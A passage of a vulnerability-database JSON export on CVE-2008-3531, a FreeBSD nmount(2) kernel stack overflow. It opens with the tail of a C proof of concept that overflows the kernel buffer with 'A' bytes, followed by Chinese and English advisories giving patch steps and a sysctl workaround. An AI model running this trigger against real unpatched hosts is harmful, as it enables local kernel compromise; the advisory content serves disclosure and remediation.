iov[2].iov_len = strlen(iov[2].iov_base) + 1;\r\n \r\n iov[3].iov_base = DIRPATH;\r\n iov[3].iov_len = strlen(iov[3].iov_base) + 1;\r\n\r\n iov[4].iov_base = calloc(BUFSIZE, sizeof(char));\r\n\r\n if(iov[4].iov_base == NULL)\r\n {\r\n perror("calloc");\r\n rmdir(DIRPATH);\r\n exit(EXIT_FAILURE);\r\n 
}\r\n\r\n memset(iov[4].iov_base, 0x41, (BUFSIZE - 1));\r\n iov[4].iov_len = BUFSIZE;\r\n\r\n iov[5].iov_base = "BBBB";\r\n iov[5].iov_len = strlen(iov[5].iov_base) + 1;\r\n\r\n printf("[*] calling nmount()\\n");\r\n\r\n if(nmount(iov, 6, 0) < 0)\r\n {\r\n perror("nmount");\r\n rmdir(DIRPATH);\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n printf("[*] unmounting and deleting %s\\n", DIRPATH);\r\n unmount(DIRPATH, 0);\r\n rmdir(DIRPATH);\r\n\r\n return EXIT_SUCCESS;\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-11781", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T21:29:14", "description": "BUGTRAQ ID: 31002\r\nCVE ID\uff1aCVE-2008-3531\r\nCNCVE ID\uff1aCNCVE-20083531\r\n\r\nFreeBSD\u662f\u4e00\u6b3e\u5f00\u653e\u6e90\u4ee3\u7801\u7684\u64cd\u4f5c\u7cfb\u7edf\u3002\r\nFreeBSD\u5904\u7406mount(2)\u548cnmount(2)\u7cfb\u7edf\u8c03\u7528\u5b58\u5728\u95ee\u9898\uff0c\u672c\u5730\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u4ee5\u5185\u6838\u8fdb\u7a0b\u6743\u9650\u6267\u884c\u4efb\u610f\u6307\u4ee4\u3002\r\n\u5404\u79cd\u7528\u6237\u5b9a\u4e49\u7684\u8f93\u5165\u5982\u6302\u63a5\u70b9\uff0c\u8bbe\u5907\uff0c\u6302\u63a5\u9009\u9879\u4f1a\u4f5c\u4e3a\u53c2\u6570\u4f20\u9012\u7ed9nmount(2)\u5230\u5185\u6838\uff0c\u5728\u90e8\u5206\u9519\u8bef\u6761\u4ef6\u4e0b\uff0c\u7528\u6237\u5b9a\u4e49\u7684\u6570\u636e\u4f1a\u6ca1\u6709\u5145\u5206\u8fb9\u754c\u68c0\u67e5\u7684\u60c5\u51b5\u4e0b\u62f7\u8d1d\u5230\u5b58\u50a8\u5728\u5185\u6838\u4e2d\u7684\u5806\u6808\u7f13\u51b2\u533a\u4e2d\u3002\u5982\u679c\u7cfb\u7edf\u914d\u7f6e\u6210\u5141\u8bb8\u975e\u7279\u6743\u7528\u6237\u6302\u63a5\u6587\u4ef6\u7cfb\u7edf\uff0c\u53ef\u5bfc\u81f4\u8fd9\u4e9b\u975e\u7279\u6743\u7528\u6237\u901a\u8fc7\u8bbe\u7f6evfs.usermount sysctl(8)\u53d8\u91cf\u5229\u7528\u8fd9\u4e9b\u7cfb\u7edf\u8c03\u7528\uff0c\u4ee5\u5185\u6838\u8fdb\u7a0b\u6743\u9650\u6267\u884c\u4efb\u610f\u6307\u4ee4\u3002\n\nFreeBSD FreeBSD 
7.0-STABLE\r\nFreeBSD FreeBSD 7.0-RELEASE\n \u5382\u5546\u89e3\u51b3\u65b9\u6848\r\n\u4f9b\u5e94\u5546\u63d0\u4f9b\u5982\u4e0b\u8865\u4e01\u53ca\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n1\uff09\u66f4\u65b0\u53d7\u5f71\u54cd\u7cfb\u7edf\u52307-STABLE\uff0c\u6216\u8005\u5230\u66f4\u6b63\u65e5\u671f\u4e4b\u540e\u7684RELENG_7_0,\u5b89\u5168\u7248\u672c\u3002\r\n2\uff09\u4e3a\u5f53\u524d\u7cfb\u7edf\u6253\u8865\u4e01\uff1a\r\n\u5982\u4e0b\u8865\u4e01\u7ecf\u9a8c\u8bc1\u53ef\u5e94\u7528\u4e8eFreeBSD 7.0\u7cfb\u7edf\u3002\r\na)\u4ece\u5982\u4e0b\u4f4d\u7f6e\u4e0b\u8f7d\u76f8\u5173\u8865\u4e01\uff0c\u5e76\u4f7f\u7528PGP\u5de5\u5177\u9a8c\u8bc1\u9644\u5e26\u7684PGP\u7b7e\u540d\uff1a\r\n# fetch <a href=http://security.FreeBSD.org/patches/SA-08:08/nmount.patch target=_blank>http://security.FreeBSD.org/patches/SA-08:08/nmount.patch</a>\r\n# fetch <a href=http://security.FreeBSD.org/patches/SA-08:08/nmount.patch.asc target=_blank>http://security.FreeBSD.org/patches/SA-08:08/nmount.patch.asc</a>\r\nb)\u5e94\u7528\u8865\u4e01\r\n# cd /usr/src\r\n# patch < /path/to/patch\r\nc)\u5982<<a href=http://www.freebsd.org/handbook/kernelconfig.html> target=_blank>http://www.freebsd.org/handbook/kernelconfig.html></a> \u6240\u8ff0\u91cd\u65b0\u7f16\u8bd1\u64cd\u4f5c\u7cfb\u7edf\u5e76\u91cd\u542f\u7cfb\u7edf\u3002", "published": "2008-09-10T00:00:00", "type": "seebug", "title": "FreeBSD 'mount(2)'\u548c'nmount(2)'\u591a\u4e2a\u6808\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-3531"], "modified": "2008-09-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-3982", "id": "SSV:3982", "sourceData": "", "sourceHref": "", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:24", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3531"], "description": "\nProblem Description:\nVarious user defined input such as mount points, devices, and\n\t mount options are 
prepared and passed as arguments to\n\t nmount(2) into the kernel. Under certain error conditions,\n\t user defined data will be copied into a stack allocated buffer\n\t stored in the kernel without sufficient bounds checking.\nImpact:\nIf the system is configured to allow unprivileged users to\n\t mount file systems, it is possible for a local adversary to\n\t exploit this vulnerability and execute code in the context of\n\t the kernel.\nWorkaround:\nIt is possible to work around this issue by allowing only\n\t privileged users to mount file systems by running the\n\t following sysctl(8) command:\n# sysctl vfs.usermount=0\n", "edition": 4, "modified": "2016-08-09T00:00:00", "published": "2008-09-03T00:00:00", "id": "7DBB7197-7B68-11DD-80BA-000BCDF0A03B", "href": "https://vuxml.freebsd.org/freebsd/7dbb7197-7b68-11dd-80ba-000bcdf0a03b.html", "title": "FreeBSD -- nmount(2) local arbitrary code execution", "type": "freebsd", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}]}